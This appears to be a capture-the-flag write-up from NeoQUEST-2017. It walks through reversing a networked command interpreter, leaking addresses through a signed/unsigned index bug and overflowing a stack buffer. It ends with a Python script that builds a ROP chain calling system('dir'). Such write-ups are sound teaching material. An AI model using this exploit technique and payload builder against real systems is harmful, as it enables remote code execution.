In the footsteps of Petya: find and exploit a software vulnerability

The high-profile events of recent months clearly show how urgent the problem of critical software vulnerabilities is. The mass WannaCry and Petya ransomware attacks were carried out by remotely exploiting zero-day vulnerabilities in Windows network services, SMBv1 and SMBv2. Finding and exploiting remote code execution vulnerabilities is obviously not an easy task. However, the best information security experts can handle it!

In one of the tasks of the on-site round of NeoQUEST-2017, participants had to find vulnerabilities in a command interpreter accessible over the network and exploit them to execute code on the remote server. To prove the compromise, they had to read the contents of a directory on the server, where, according to the task conditions, the key was placed. The participants had access to the interpreter binary. So, let's get started!

Starting the analysis

First, we launch the binary and take a look at it. The interpreter is a PE executable built for the Intel x64 architecture. It is compiled with DEP and ASLR support, but without CFG. No third-party libraries are loaded either.

The program itself is a simple command interpreter for working with an integer vector. The syntax of the supported commands is printed when the program starts. The vector supports writing and reading individual cells, as well as loading the whole vector at once.

With the surface analysis done, it's time to start reversing: this is an on-site round, and the clock is ticking!

What can we feed to the input?

The first intermediate task is to pin down the attack surface precisely. We determine the number and format of the commands by loading the binary into IDA Pro. The main function is easy to find by searching for the strings it prints.

The analysis of the main function allows us to state the following:

1. First, the address of the array on the stack of the main function is stored in the variable array_base. The array cells are zero-initialized in a loop. The loop exit condition reveals the size of the array: 100 (0x64) integer cells.

2. The welcome screen is displayed and the user's command is read. The presence of the strings “cls” and “whoami” points to a call to the system function (this will come in handy later).

3. Regular expressions are initialized to check command syntax. They show that there are no undocumented commands, and they also reveal the set of permissible parameters for each command.

4. In an infinite loop, each entered command is matched against the regular expressions in turn. If a match is found, the command's arguments are parsed and its handler is called.

So, the analysis of the main function showed that there are no undocumented commands. We can influence the following parameters:

the indices in the set / get commands;
the value written by the set command;
the size and contents of the buffer written to the array by the load command.

Since the ASLR and DEP protection mechanisms are enabled, two vulnerabilities need to be found and exploited:

an address disclosure vulnerability that leaks an address in executable memory, to bypass ASLR and build a ROP chain that bypasses DEP;
a control-flow hijacking vulnerability that redirects execution to an address we control, to transfer control to the beginning of the ROP chain and execute code.

ROP (Return-Oriented Programming) is a modern exploitation technique aimed at circumventing the DEP protection mechanism. Its essence lies in reusing small fragments of executable memory (gadgets) that end with a ret instruction. The addresses of the gadgets are chained on the stack and popped from it one by one: each gadget executes its instructions up to the ret, which in turn pops the address of the next gadget from the stack, and so on.
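To make the mechanism concrete, here is a toy Python model of ret-driven execution. It is only a sketch: the gadget addresses (0x1000, 0x2000), the register dictionary, and the names run_rop_chain, pop_rcx and fake_call are invented for illustration and are unrelated to the real binary.

```python
def run_rop_chain(stack, gadgets):
    """Toy model: every `ret` pops the next gadget address from the stack."""
    regs = {}
    trace = []
    stack = list(stack)            # index 0 plays the role of the top of the stack
    while stack:
        addr = stack.pop(0)        # what `ret` does: pop an address and jump to it
        name, body = gadgets[addr]
        trace.append(name)
        body(regs, stack)          # the gadget body may pop its own operands
    return regs, trace


def pop_rcx(regs, stack):
    regs["rcx"] = stack.pop(0)     # models `pop rcx`


def fake_call(regs, stack):
    regs["called_with"] = regs["rcx"]   # models a function that takes its argument in rcx


# Hypothetical gadget table: address -> (description, behaviour)
GADGETS = {
    0x1000: ("pop rcx ; ret", pop_rcx),
    0x2000: ("function taking rcx", fake_call),
}

# Chain: gadget address, operand for pop rcx, address of the final function
regs, trace = run_rop_chain([0x1000, 0xCAFE, 0x2000], GADGETS)
print(trace, hex(regs["called_with"]))
```

The attacker never injects instructions here; only the list of addresses and operands on the stack is controlled, which is why DEP does not stop this technique.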

Vulnerability #1

Now we know that the target array has a constant size and is located on the stack of the main function. Let's try to read a cell with an index that goes beyond the array.

At first, for indices larger than the array size, we observe normal behavior: an error message is printed. However, when the index is larger than 2147483647, the program either crashes or returns some values.

It seems that indices which are interpreted as negative numbers pass the bounds check, and the program returns the contents of memory at a negative offset from the start of the array. Vulnerability found!

Why does this happen? The vulnerability lies in the incorrect handling of the index in the set / get commands. The numeric index is read as a command parameter and converted from a string to a number by calling stoul. This function returns an unsigned integer.

However, when the parameter is passed to the SET / GET handler, the same value is erroneously cast to a signed integer: it is compared with the size of the array using the signed comparison instruction jl. The GET command then returns the value of the memory cell at that offset from the beginning of the array.
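The flawed check can be modelled in a few lines of Python. This is a sketch under assumptions: the index is taken to end up in a 32-bit value, int() stands in for stoul, and the helper names as_signed32 and bounds_check are hypothetical, not taken from the binary.

```python
ARRAY_SIZE = 100  # size of the array recovered from main


def as_signed32(value):
    """Reinterpret the low 32 bits of value as a signed integer."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value >= 0x80000000 else value


def bounds_check(index_text):
    """Model of the flawed check: parse as unsigned, compare as signed."""
    unsigned_index = int(index_text) & 0xFFFFFFFF   # stand-in for stoul (32-bit result assumed)
    signed_index = as_signed32(unsigned_index)
    accepted = signed_index < ARRAY_SIZE            # signed comparison, like jl
    return accepted, signed_index


for text in ("5", "100", "2147483648", "4294967282"):
    print(text, bounds_check(text))
```

Any index above 2147483647 becomes negative after the cast, so it is always "less than 100" and slips through the check.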

This behavior can be used to leak an address in executable memory. Since the array is located on the stack, reading cells with negative indices lets us view the contents of the stack located before the array. Since the architecture is x64, addresses occupy 8 bytes, while the array is read 4 bytes at a time. Therefore, to read an address from memory, we must print two consecutive cells.

Using the debugger, we experimentally find cells before the buffer that hold an executable address, for example 4294967282 == -14 and 4294967283 == -13. We will use their values later when building the ROP chain.
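Joining the two cells into one address is simple bit arithmetic. A minimal sketch, assuming the lower-indexed cell holds the low half of the address; the helper name join_cells is hypothetical, and the sample values are the ones that appear in the exploit script further below.

```python
def join_cells(low, high):
    """Combine two consecutive 32-bit array cells into one 64-bit value."""
    return ((high & 0xFFFFFFFF) << 32) | (low & 0xFFFFFFFF)


# Sample values: cell -14 (low half) and cell -13 (high half)
leaked = join_cells(0x2f150000, 0x7ff6)
print(hex(leaked))
```

The masks make the helper tolerant of cells that the interpreter might print as negative numbers.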

In addition, later on, during exploitation, we will need the address of the buffer on the stack. How do we find it? Looking at the beginning of the main function, we see that the variable array_base stores a pointer to the beginning of the buffer.

On the stack, this variable is located at rsp + 0x358 - 0x328, and the buffer itself starts at rsp + 0x358 - 0x198.

Therefore, to read the variable array_base, we need to step back (0x328 - 0x198) / 4 = 100 four-byte cells from the beginning of the array. The indices we are looking for are 4294967196 and 4294967197.
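The index arithmetic can be double-checked with a short Python sketch. The helper name wrapped_index is hypothetical; it assumes the index is truncated to 32 bits, as the observed behavior suggests.

```python
def wrapped_index(cell_offset):
    """Unsigned 32-bit index that the interpreter will treat as cell_offset."""
    return cell_offset & 0xFFFFFFFF


# array_base is at rsp + 0x358 - 0x328, the buffer at rsp + 0x358 - 0x198
cells_back = (0x328 - 0x198) // 4
low_index = wrapped_index(-cells_back)        # low half of the pointer
high_index = wrapped_index(-cells_back + 1)   # high half of the pointer
print(cells_back, low_index, high_index)
```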

Thanks to this vulnerability, we have leaked an executable address in the process memory and also found the address of the buffer that will hold the parameters of the ROP chain. Now we need to find a way to hijack the program's control flow.

Vulnerability #2

So far, we have not examined the interpreter's load function. Let's look at it more closely. A classic stack buffer overflow turns up almost immediately. The string entered from the keyboard, the argument of the load command, is extracted and passed as the first parameter of the LOAD handler function. The second parameter is the address of the target buffer.

The LOAD function writes the input data to this buffer without any checks on its size. As you can see, the number of bytes written depends only on the length of the input string.

By passing a sufficiently long argument to the load command, we can overwrite the return address on the stack and, when the interpreter exits, transfer control to an address we control. Given the size and location of the buffer on the stack, the initial control transfer address must be placed at an offset of 4 * (100 + 2) bytes (the additional 8 bytes overwrite the value of the rbp register saved on the stack).

Since the overflowed buffer is located on the stack rather than on the heap, we will place the whole ROP chain in the same place, starting at offset 4 * (100 + 2) in the argument of the load command.
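The offset follows directly from the stack layout described above. A small sketch of the arithmetic, with constant names chosen here purely for illustration:

```python
CELL_SIZE = 4        # bytes per array cell
ARRAY_CELLS = 100    # cells in the stack array
SAVED_RBP = 8        # bytes of saved rbp between the array and the return address

# Number of bytes to write before reaching the saved return address
return_address_offset = ARRAY_CELLS * CELL_SIZE + SAVED_RBP
# The same distance expressed in four-byte filler values
filler_dwords = return_address_offset // CELL_SIZE
print(return_address_offset, filler_dwords)
```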

Now all the ingredients are in place. It's time to assemble a working exploit from them!

Pwn it!

To get the task key, we must read and display the contents of the local directory on the server. Earlier in the analysis, we noted that the screen is cleared before the greeting is displayed and that the greeting contains the user name.

Obviously, the function that does this and takes the “cls” and “whoami” strings as parameters behaves like the library function system. We need to call this function, but pass “dir” as the command to execute, which displays the contents of the local directory on the server.

Let's construct a ROP chain that does this. The sequence of operations is as follows:

Place the string “dir” at an address that is known at the moment the vulnerability is triggered.
Put the address of this string into the rcx register.
Transfer control to the system_func function.

When placing addresses in the buffer, we must remember that ASLR is enabled and compute them dynamically from the previously leaked addresses of executable memory and of the beginning of the buffer. In addition, they are written to the buffer in little-endian order, that is, from the low bytes to the high bytes.
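As an illustration of the byte order, here is a minimal Python sketch that encodes a 64-bit address with the standard struct module. The helper name pack_address and the sample address are made up for the example.

```python
import struct


def pack_address(address):
    """Encode a 64-bit address as 8 bytes, low byte first."""
    return struct.pack("<Q", address)


# Made-up address, used only to show the byte order
encoded = pack_address(0x00007ff612345678)
print(encoded.hex())  # 78563412f67f0000
```

The low byte 0x78 comes first and the two zero high bytes come last, which is exactly how the address must be laid out in the overflowing buffer.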

Now we need to find the offsets of the necessary gadgets in the interpreter's executable file. The first gadget is needed to put the address of the string “dir” into rcx, the second to call the function system_func. The required code fragments are located in the code section of the interpreter's executable at offsets 0x24c00 and 0x16ce6, respectively.

We place the string "dir" right after the gadgets. Its address will therefore be 4 * (100 + 2) + 6 * 4 bytes greater than the buffer address.
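The address computation can be sketched as follows. The chain consists of three 64-bit entries (the gadget address, the string pointer, and the address of the system-like function), that is, six four-byte values. The function name dir_string_address is hypothetical, and the sample buffer address is assembled from the values used in the script below.

```python
def dir_string_address(buffer_address, filler_dwords=102, chain_dwords=6):
    """Address of the command string placed right after the ROP chain."""
    return buffer_address + 4 * filler_dwords + 4 * chain_dwords


# Sample buffer address: high half 0xe8, low half 0x0afcf6e0
buffer_address = (0xe8 << 32) | 0x0afcf6e0
print(hex(dir_string_address(buffer_address)))
```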

Below is our version of the script to generate the contents of the buffer:

    from __future__ import print_function

    n = 102  # filler dwords: 100 array cells + 2 for the saved rbp
    f = open("buf.txt", "w")

    # Values leaked from the remote process with the get command
    base_l = 0x2f150000 - 0x0  # get 4294967282
    base_h = 0x7ff6            # get 4294967283
    buffer_l = 0x0afcf6e0      # get 4294967196
    buffer_h = 0xe8            # get 4294967197

    def rev(x):
        # Swap the byte order of a 32-bit value (little-endian output)
        return ((x << 24) & 0xff000000 |
                (x << 8) & 0x00ff0000 |
                (x >> 8) & 0x0000ff00 |
                (x >> 24) & 0x000000ff)

    arr = [
        base_l + 0x24c00, base_h,            # pop rcx ; ret
        buffer_l + n*0x4 + 6*0x4, buffer_h,  # pointer to "dir" in the buffer - goes into rcx
        base_l + 0x16ce6, base_h             # &system in our binary
    ]

    for i in range(0, n):  # filler up to the return address
        print("%08x" % rev(0xdeadbeef), end='', file=f)
    for i in arr:
        print("%08x" % rev(i), end='', file=f)
    # "dir\0"
    print("%08x" % 0x64697200, end='', file=f)
    f.close()

Everything is ready, it's time to go get the key!

Connect to the remote server and obtain the necessary addresses with the get command.
Generate the malicious buffer based on them.
Execute the load command to overwrite the return address of the main function.
Execute the exit command, which terminates the main function and triggers the exploit.

The key we were after: fb520eb552747437c09f2770a9a282ea.

What is the result?

In NeoQUEST, we put together a wide variety of tasks that require knowledge from different areas of information security and show what a careless attitude to security can lead to: weak passwords, poor server implementation (in this article we searched for such a vulnerability using fuzzing, and in this article we described it in detail), weak ciphers. The example of this task clearly shows how carelessness in programming can cause critical damage to information security.

Source: https://habr.com/ru/post/335046/
